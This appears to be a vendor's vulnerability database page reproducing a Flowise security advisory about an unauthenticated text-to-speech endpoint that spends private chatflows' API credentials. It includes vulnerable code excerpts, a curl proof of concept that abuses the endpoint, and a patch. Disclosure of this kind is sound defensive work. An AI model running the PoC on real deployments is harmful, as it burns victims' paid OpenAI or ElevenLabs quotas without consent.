Vulnerability DatabaseGHSA-8gj2-2cvc-6xx7

GHSA-8gj2-2cvc-6xx7
Flowise vulnerability analysis and mitigation

Summary

The /api/v1/text-to-speech/generate endpoint is whitelisted (requires no authentication) and accepts any chatflowId without checking whether the referenced chatflow is public. An unauthenticated attacker who knows a valid chatflow UUID can abuse that chatflow's TTS credential (OpenAI or ElevenLabs API key) to generate unlimited text-to-speech audio, incurring costs on the chatflow owner's account.

Details

The TTS generateTextToSpeech controller at packages/server/src/controllers/text-to-speech/index.ts:10-171 is whitelisted at packages/server/src/utils/constants.ts:41:

'/api/v1/text-to-speech/generate',

When a chatflowId is provided and the user is not authenticated (no req.user), the controller falls back to fetching the chatflow without workspace scoping:

// packages/server/src/controllers/text-to-speech/index.ts:36-42
if (workspaceId) {
    chatflow = await chatflowsService.getChatflowById(chatflowId, workspaceId)
} else {
    // Fallback: get workspaceId from chatflow when req.user.activeWorkspaceId is not set
    chatflow = await chatflowsService.getChatflowById(chatflowId)  // NO isPublic check
    workspaceId = chatflow.workspaceId
}

The getChatflowById function at packages/server/src/services/chatflows/index.ts:247-272 fetches any chatflow by ID when workspaceId is not provided:

const dbResponse = await appServer.AppDataSource.getRepository(ChatFlow).findOne({
    where: {
        id: chatflowId,
        ...(workspaceId ? { workspaceId } : {})  // No workspace filter when workspaceId is undefined
    }
})

The controller then extracts the TTS provider configuration from the chatflow:

// packages/server/src/controllers/text-to-speech/index.ts:51-66
const ttsConfig = JSON.parse(chatflow.textToSpeech)
const activeProviderKey = Object.keys(ttsConfig).find(key => ttsConfig[key].status === true)
const providerConfig = ttsConfig[activeProviderKey]
provider = activeProviderKey
credentialId = providerConfig.credentialId  // Extracted from private chatflow

This credentialId is then used to decrypt and use the stored credential (OpenAI or ElevenLabs API key) to make TTS API calls at packages/components/src/textToSpeech.ts:33-34:

const credentialId = textToSpeechConfig.credentialId as string
const credentialData = await getCredentialData(credentialId ?? '', options)

PoC


# Step 1: Know a chatflow UUID that has TTS enabled (any chatflow, public or private)
CHATFLOW_ID="<any-chatflow-uuid-with-tts-enabled>"

# Step 2: Abuse the TTS credential to generate audio without authentication
curl -X POST "http://localhost:3000/api/v1/text-to-speech/generate" \
  -H "Content-Type: application/json" \
  -d '{
    "chatflowId": "'${CHATFLOW_ID}'",
    "chatId": "attacker-chat-1",
    "chatMessageId": "msg-1",
    "text": "This is a test of unauthorized TTS generation using someone elses API key"
  }'

# Expected: Returns SSE stream with TTS audio data using the chatflow owner's OpenAI/ElevenLabs credentials

# event: tts_start

# data: {"event":"tts_start","data":{"chatMessageId":"msg-1","format":"mp3"}}

# event: tts_data

# data: {"event":"tts_data","data":{"chatMessageId":"msg-1","audioChunk":"<base64-audio>"}}

# Step 3: Repeat with large text to incur costs
curl -X POST "http://localhost:3000/api/v1/text-to-speech/generate" \
  -H "Content-Type: application/json" \
  -d '{
    "chatflowId": "'${CHATFLOW_ID}'",
    "chatId": "attacker-chat-2",
    "chatMessageId": "msg-2",
    "text": "'$(python3 -c "print('A' * 4096)")'"
  }'

Impact

  • Financial Impact: An attacker can generate unlimited TTS audio using the chatflow owner's OpenAI or ElevenLabs API credentials, incurring potentially significant costs. OpenAI TTS costs ~$15/1M characters; an attacker could generate large volumes of audio.
  • Credential Abuse: The attacker effectively gains indirect access to the stored API credentials without needing to authenticate or have any permissions. The credentials are not directly exposed but are used on behalf of the attacker.
  • Denial of Service: By exhausting the API quota/budget of the credential, the attacker can deny service to legitimate users of the chatflow.
  • Affects Private Chatflows: This vulnerability affects all chatflows with TTS configured, including those explicitly marked as private (isPublic: false).
  1. Check isPublic before allowing unauthenticated TTS generation:
// packages/server/src/controllers/text-to-speech/index.ts
if (chatflowId) {
    let chatflow;
    let workspaceId = req.user?.activeWorkspaceId;
    
    if (workspaceId) {
        chatflow = await chatflowsService.getChatflowById(chatflowId, workspaceId)
    } else {
        chatflow = await chatflowsService.getChatflowById(chatflowId)
        // Verify the chatflow is public before using its credentials
        if (!chatflow.isPublic) {
            throw new InternalFlowiseError(
                StatusCodes.UNAUTHORIZED,
                'TTS generation requires authentication for non-public chatflows'
            )
        }
        workspaceId = chatflow.workspaceId
    }
    // ... rest of the function
}
  1. Consider applying rate limiting to the TTS endpoint to prevent abuse even for public chatflows.

SourceNVD

Related Flowise vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-70477CRITICAL9.5
  • JavaScript logoJavaScript
  • flowise
NoYesAug 04, 2026
CVE-2026-70478CRITICAL9.2
  • Flowise logoFlowise
  • flowise
NoYesAug 04, 2026
CVE-2026-70476HIGH8.3
  • Flowise logoFlowise
  • flowise
NoYesAug 04, 2026
CVE-2026-70475HIGH7.1
  • Flowise logoFlowise
  • flowise
NoYesAug 04, 2026
GHSA-8gj2-2cvc-6xx7MEDIUM6.3
  • Flowise logoFlowise
  • flowise
NoYesAug 04, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management